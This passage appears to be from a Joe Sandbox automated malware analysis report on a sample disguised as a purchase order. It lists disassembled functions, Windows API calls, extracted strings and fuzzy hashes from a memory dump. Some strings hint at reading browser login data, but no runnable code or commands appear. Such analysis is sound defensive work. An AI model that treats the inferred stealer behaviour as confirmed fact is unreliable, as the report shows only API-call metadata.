                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                              • free.MSVCRT ref: 004185AC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                              • String ID:
                                                              • API String ID: 2802642348-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              APIs
                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                              • memset.MSVCRT ref: 0041BA3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                              • memset.MSVCRT ref: 00405E33
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
